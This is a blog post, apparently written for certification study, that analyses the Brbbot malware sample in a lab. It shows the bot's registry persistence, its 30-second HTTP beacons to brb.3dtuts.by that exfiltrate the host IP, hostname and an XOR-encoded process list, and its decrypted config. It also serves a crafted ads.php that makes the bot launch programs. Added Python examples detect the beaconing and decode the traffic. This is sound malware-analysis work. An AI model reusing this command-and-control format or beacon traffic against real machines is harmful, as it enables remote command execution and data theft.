This post, and the others this month, are part of a series I am using to help me prepare for my GIAC Reverse Engineering Malware (GREM) certification.
In the previous post, we did static analysis of Brbbot. In this post, we look at dynamic analysis to gain insight into the program's behaviour. Remember, VirusTotal reported that 52/74 engines flagged this file as malicious.
The tools used here are as follows:
– TShark
– INetSim on Kali
– Process Monitor – Windows 10
– Process Hacker – Windows 10
– Process Explorer – Windows 10
– RegShot – Windows 10
– ProcDOT
Let's see what the above tools give us after running brbbot.exe on Windows 10 as administrator.
Looking first at the RegShot comparison summary, we see:
Note that the total number of changes is not all from running brbbot.exe; some come from other programs that were run, intentionally or not.
Looking through the report and picking out some interesting entries, the Run key pointing at a copy of brbbot.exe under AppData\Roaming is the autostart persistence to note:
Created with Regshot 1.9.1 x64 Unicode (beta r321)
Comments:
Datetime: 2020-11-08 20:19:04, 2020-11-08 22:15:15
Computer: SECURITYNIK-WIN, SECURITYNIK-WIN
Username: SecurityNik, SecurityNik

Values added:
...
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"
HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\brbbot.exe: 53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 00 28 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 DB 80 FD AC 28 39 D3 01 00 00 00 00 00 00 00 00
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"
...
Taking a quick look through Process Hacker.
Looking at the General tab.
Peeking into the strings loaded in memory.
Peeking into the modules in use by brbbot.exe.
Looking at the Handles.
Moving on to the network traffic, as seen from the perspective of INetSim and TShark.
$ sudo cat /var/log/inetsim/report/report.18951.txt | more
=== Report for session '18951' ===

Real start date            : 2020-11-08 17:11:53
Simulated start date       : 2020-11-08 17:11:53
Time difference on startup : none
...
2020-11-08 17:12:52  DNS connection, type: A, class: IN, requested name: brb.3dtuts.by
2020-11-08 17:12:52  HTTP connection, method: GET, URL: http://brb.3dtuts.by/ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e, file name: /var/lib/inetsim/http/fakefiles/sample.html
...
└─$ tshark -r brbbot.pcap -Y "dns.qry.name == brb.3dtuts.by"
   15 25.543214256   10.0.0.110 → 10.0.0.114   DNS 73 Standard query 0x6a64 A brb.3dtuts.by
   16 25.551623068   10.0.0.114 → 10.0.0.110   DNS 89 Standard query response 0x6a64 A brb.3dtuts.by A 10.0.0.114
Looking at the HTTP traffic, we see below that there are many connections. Looking more closely at the timing, it appears the malware calls home (beacons) every 30 seconds.
└─$ tshark -r brbbot.pcap -Y "http.host == brb.3dtuts.by" -T fields -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.host -E header=y
frame.time                          ip.src      tcp.srcport  ip.dst      tcp.dstport  http.host
Nov 8, 2020 17:12:52.715732789 EST  10.0.0.110  4081         10.0.0.114  80           brb.3dtuts.by
Nov 8, 2020 17:13:22.745066520 EST  10.0.0.110  4082         10.0.0.114  80           brb.3dtuts.by
Nov 8, 2020 17:13:52.763137491 EST  10.0.0.110  4084         10.0.0.114  80           brb.3dtuts.by
Nov 8, 2020 17:14:22.782289408 EST  10.0.0.110  4086         10.0.0.114  80           brb.3dtuts.by
Nov 8, 2020 17:14:52.826690345 EST  10.0.0.110  4087         10.0.0.114  80           brb.3dtuts.by
Nov 8, 2020 17:15:22.865526674 EST  10.0.0.110  4088         10.0.0.114  80           brb.3dtuts.by
Nov 8, 2020 17:15:52.908439391 EST  10.0.0.110  4089         10.0.0.114  80           brb.3dtuts.by
Nov 8, 2020 17:16:22.928449020 EST  10.0.0.110  4090         10.0.0.114  80           brb.3dtuts.by
Nov 8, 2020 17:16:52.954382147 EST  10.0.0.110  4092         10.0.0.114  80           brb.3dtuts.by
Looking at the session with source port 4081 and destination port 80, we see:
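The 30-second cadence above can be checked rather than eyeballed. This is an added example, not part of the original post, that parses tshark's -T fields rows for the HTTP requests and flags a (source, host) pair as beaconing when the gaps between requests are nearly constant; the tab-separated row layout and the 5% jitter threshold are assumptions.

```python
import re
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: the first five rows of the tshark output above
# (frame.time, ip.src, tcp.srcport, ip.dst, tcp.dstport, http.host),
# tab-separated as "-T fields" emits them, timestamps copied from the capture.
TSHARK_ROWS = """\
Nov 8, 2020 17:12:52.715732789 EST\t10.0.0.110\t4081\t10.0.0.114\t80\tbrb.3dtuts.by
Nov 8, 2020 17:13:22.745066520 EST\t10.0.0.110\t4082\t10.0.0.114\t80\tbrb.3dtuts.by
Nov 8, 2020 17:13:52.763137491 EST\t10.0.0.110\t4084\t10.0.0.114\t80\tbrb.3dtuts.by
Nov 8, 2020 17:14:22.782289408 EST\t10.0.0.110\t4086\t10.0.0.114\t80\tbrb.3dtuts.by
Nov 8, 2020 17:14:52.826690345 EST\t10.0.0.110\t4087\t10.0.0.114\t80\tbrb.3dtuts.by
"""

def parse_frame_time(text):
    """tshark prints nanoseconds plus a zone name; strptime takes at most
    microseconds and no zone name, so trim both before parsing."""
    m = re.match(r"(\w+ \d+, \d{4} \d\d:\d\d:\d\d\.\d{6})\d* \w+$", text)
    if not m:
        raise ValueError("unexpected frame.time format: " + text)
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")

def beacon_profile(rows, jitter_ratio=0.05):
    """Group requests by (src, host); a host is 'periodic' when the spread of
    the inter-request gaps is small relative to their mean (a fixed sleep)."""
    times = {}
    for line in rows.strip().splitlines():
        ftime, src, _sport, _dst, _dport, host = line.split("\t")
        times.setdefault((src, host), []).append(parse_frame_time(ftime))
    profile = {}
    for key, stamps in times.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(gaps) < 2:  # fewer than three requests: no period to speak of
            profile[key] = {"count": len(stamps), "mean_gap": None, "periodic": False}
            continue
        avg = mean(gaps)
        profile[key] = {"count": len(stamps), "mean_gap": avg,
                        "periodic": pstdev(gaps) <= jitter_ratio * avg}
    return profile

if __name__ == "__main__":
    for (src, host), p in beacon_profile(TSHARK_ROWS).items():
        print(f"{src} -> {host}: {p['count']} requests, "
              f"mean gap {p['mean_gap']:.2f}s, periodic={p['periodic']}")
```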
└─$ tshark -r brbbot.pcap -q -z follow,tcp,ascii,10.0.0.110:4081,10.0.0.114:80    130 ⨯
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.110 and tcp.srcport eq 4081) and (ip.dst eq 10.0.0.114 and tcp.dstport eq 80)) or ((ip.src eq 10.0.0.114 and tcp.srcport eq 80) and (ip.dst eq 10.0.0.110 and tcp.dstport eq 4081))
Node 0: 10.0.0.110:4081
Node 1: 10.0.0.114:80
2148
GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=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 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Connection: Close
Cache-Control: no-cache

	150
HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html
Date: Sun, 08 Nov 2020 22:12:52 GMT
Content-Length: 258
Server: INetSim HTTP Server

	258
<html>
  <head>
    <title>INetSim default HTML page</title>
  </head>
  <body>
    <p></p>
    <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
    <p align="center">This file is an HTML document.</p>
  </body>
</html>
Above we see the default INetSim page being returned. However, the request was for ads.php. Maybe we can influence this request by providing a file named ads.php. I switched over to Apache instead, created a file named ads.php in the Apache document root and then let brbbot.exe fetch that file. That seemed to work. Let's see what it looks like. Here is the file:
└─$ sudo cat /var/www/html/ads.php
<HTML>
<TITLE>SecurityNik ads.php</TITLE>
<BODY>
Welcome to SecurityNik World!
</BODY>
</HTML>
When the bot makes its request, we see Apache return ads.php with a 200 success response.
10.0.0.110 - - [08/Nov/2020:22:24:05 -0500] "GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=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 HTTP/1.1" 200 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
Stepping back for a moment, we saw the system create a file, brbconfig.tmp. Looking into the file, we see:
The above does not seem to help at all. Looking through hexdump:
Now that we know the file is created, let's jump to where the file is read by setting another breakpoint, this time on the ReadFile call. Microsoft's documentation says the first argument to ReadFile is a handle to the device. Looking below, we see the handle is 0x108, which can be found in the RCX register.
To confirm that this is the handle to the brbconfig.tmp file, we now look at the handle from a different perspective. This time we go back to Sysinternals handle64.exe.
C:\Tools\SysinternalsSuite>handle64.exe -p brbbot.exe

Nthandle v4.11 - Handle viewer
Copyright (C) 1997-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

------------------------------------------------------------------------------
brbbot.exe pid: 4164 SECURITYNIK-WIN\SecurityNik
  108: File  (R--)   C:\GREM-Malware\Malware\day1\brbconfig.tmp
Scrolling until I reached the CryptDecrypt function, I then set a breakpoint on the instruction directly after it. This allowed me to see the decrypted contents of the brbconfig.tmp file, as in the image below.
"uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"
Above we see the ads.php file being requested, along with what appear to be commands to be executed and the encode value 5b.
Let's add an exec value of notepad.exe to our ads.php file and see what we get:
└─$ sudo bash -c 'echo -e cexe notepad.exe > /var/www/html/ads.php'
└─$ sudo cat /var/www/html/ads.php
cexe notepad.exe
Running brbbot.exe again, we see that notepad is executed every 30 seconds.
PS C:\Users\SecurityNik> Get-Process *notepad* | Select-Object -Property Name,Id,StartTime,ProcessName | Sort-Object -Property StartTime

Name      Id StartTime             ProcessName
----      -- ---------             -----------
notepad 5444 11/9/2020 11:38:58 PM notepad
notepad 3528 11/9/2020 11:39:29 PM notepad
notepad 3856 11/9/2020 11:39:59 PM notepad
notepad 7740 11/9/2020 11:40:29 PM notepad
notepad 5376 11/9/2020 11:40:59 PM notepad
notepad 6984 11/9/2020 11:41:29 PM notepad
notepad 7252 11/9/2020 11:41:59 PM notepad
notepad 7748 11/9/2020 11:42:29 PM notepad
notepad 7176 11/9/2020 11:42:59 PM notepad
notepad 2964 11/9/2020 11:43:29 PM notepad
notepad 3640 11/9/2020 11:43:59 PM notepad
notepad 2280 11/9/2020 11:44:29 PM notepad
notepad 5448 11/9/2020 11:44:59 PM notepad
notepad 8184 11/9/2020 11:45:29 PM notepad
notepad 2112 11/9/2020 11:45:59 PM notepad
notepad 2428 11/9/2020 11:46:29 PM notepad
notepad 3368 11/9/2020 11:46:59 PM notepad
notepad 5036 11/9/2020 11:47:29 PM notepad
notepad 3632 11/9/2020 11:47:59 PM notepad
notepad 2608 11/9/2020 11:48:29 PM notepad
notepad 6372 11/9/2020 11:48:59 PM notepad
notepad 7524 11/9/2020 11:49:29 PM notepad
notepad 6780 11/9/2020 11:49:59 PM notepad
notepad  248 11/9/2020 11:50:29 PM notepad
notepad 7616 11/9/2020 11:50:59 PM notepad
notepad  192 11/9/2020 11:51:29 PM notepad
Taking a look via WMIC, we see every notepad.exe shares the same parent process:
PS C:\Users\SecurityNik> wmic process where "name like '%notepad%'" get name,processID,ParentProcessID
Name         ParentProcessId  ProcessId
notepad.exe  1596             5444
notepad.exe  1596             3528
notepad.exe  1596             3856
notepad.exe  1596             7740
notepad.exe  1596             5376
notepad.exe  1596             6984
notepad.exe  1596             7252
notepad.exe  1596             7748
notepad.exe  1596             7176
notepad.exe  1596             2964
notepad.exe  1596             3640
notepad.exe  1596             2280
notepad.exe  1596             5448
notepad.exe  1596             8184
notepad.exe  1596             2112
notepad.exe  1596             2428
notepad.exe  1596             3368
notepad.exe  1596             5036
notepad.exe  1596             3632
notepad.exe  1596             2608
notepad.exe  1596             6372
notepad.exe  1596             7524
notepad.exe  1596             6780
notepad.exe  1596             248
notepad.exe  1596             7616
notepad.exe  1596             192
notepad.exe  1596             672
PS C:\Users\SecurityNik> wmic process where processid="1596" get name,processID,parentProcessID
Name        ParentProcessId  ProcessId
brbbot.exe  4476             1596
The final step now is to decode the data in the p parameter of the HTTP request above. We saw the value encode=5b in the decrypted configuration alongside uri=ads.php. This 5b is used to encode the values carried in the hex p parameter. I copied the values from the p parameter into a file named p-parameter.txt, all on one line. Here is what it looks like:
└─$ cat p-parameter.txt
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
xxd is used next to revert the hex value above to raw binary, as shown below:
└─$ xxd -revert -plain p-parameter.txt > p-parameter.raw
The p-parameter.raw file looks like this:
└─$ cat p-parameter.raw ?7>"(/>6`(6((u>#>`8()((u>#>`,25252/u>#>`8()((u>#>`,2574<45u>#>`(>)-28>(u>#>`7(:((u>#>`(-834(/u>#>`=45/?)-34(/u>#>`=45/?4>)-28>u>#>`>64)"{▒46+)>((245`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(+447(-u>#>`(-834(/u>#>"(645u>#>`(+7.50?u>#>>8.)2/">:7/>)-28>u>#>`(-834(/u>#>`.5(>8:++u>#>`84534(/u>#>`(+7.50v,25>-/74<u>#>`(-834(/u>#>>:)835?>#>)u>#>`(-834(/u>#>`(234(/u>#>`(-834(/u>#>`/:(034(/,u>#>`8/=645u>#>`>#+74)>)u>#>3>77#+>)2>58>4(/u>#>>:)83u>#>` .5/26>)4#):"u>#>`5>)2->u>#>`>7+0>)u>#>0"+>:80<)4.5?4(/u>#>▒.2u>#>` :5>u>#>`▒++728:/245):6>4(/u>#>` )48>((:80>)u>#>`+)48>#+mou>#>` .5/26>)40>)u>#>`?7734(/u>#>`86?u>#>`84534(/u>#>` )48645u>#>` )48645mou>#>` ><(34/v#mov5284?>u>#>`(-834(/u>#>` 2)>(3:)0u>#>"(/>>//25<(u>#>`/:(034(/,u>#>`?7734(/u>#>`?7734(/u>#>`9)994/u>#>
To decode the p-parameter.raw file, I passed it as input to CyberChef.
After decoding, we see that along with the IP address and computer name, brbbot.exe also exfiltrates information about the processes running on the host.
That's it for this post, as I believe I got the learning I needed from this malware.
PS: Not sure if you noticed, but I had to run brbbot.exe several times, so you may have spotted that the PIDs change, etc. The concept still remains the same.
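As an added example (not the author's CyberChef recipe, and not code from the sample), the decoding of the p parameter can be scripted straight from the decrypted configuration shown earlier: the encode value 5b is taken as a single-byte XOR key applied after hex-decoding p, which is an assumption confirmed by the readable process names it produces, and the p value in the URL below is cut down to its first 21 bytes from the capture above.

```python
from urllib.parse import urlsplit, parse_qs

# Decrypted brbconfig.tmp contents from the post. The command words are the
# action names spelled backwards (cexe/exec, elif/file, fnoc/conf, tixe/exit).
CONFIG = "uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"

# Constructed sample: the beacon URL from the capture, p shortened to 21 bytes.
BEACON_URL = ("http://brb.3dtuts.by/ads.php?i=169.254.204.15&c=SECURITYNIK-WIN"
              "&p=123f373e600822282f3e366028362828753e233e60")

def parse_config(text):
    """'key=value;key=value' -> dict."""
    return dict(item.split("=", 1) for item in text.split(";") if item)

def decode_p(hex_value, key):
    """Hex-decode the p parameter, then XOR every byte with the one-byte key
    (assumption: 'encode=5b' is a XOR key; the output reads as process names)."""
    raw = bytes.fromhex(hex_value)
    return bytes(b ^ key for b in raw).decode("latin-1")

def decode_beacon(url, config):
    """Pull the host fields out of the beacon URL and decode the process list."""
    qs = parse_qs(urlsplit(url).query)
    key = int(config["encode"], 16)
    procs = decode_p(qs["p"][0], key)
    return {
        "ip": qs["i"][0],
        "hostname": qs["c"][0],
        # the decoded list is ';'-separated with a trailing ';'
        "processes": [p for p in procs.split(";") if p],
        # sleep is in milliseconds, matching the 30-second beacon seen in tshark
        "sleep_seconds": int(config["sleep"]) / 1000,
    }

if __name__ == "__main__":
    print(decode_beacon(BEACON_URL, parse_config(CONFIG)))
```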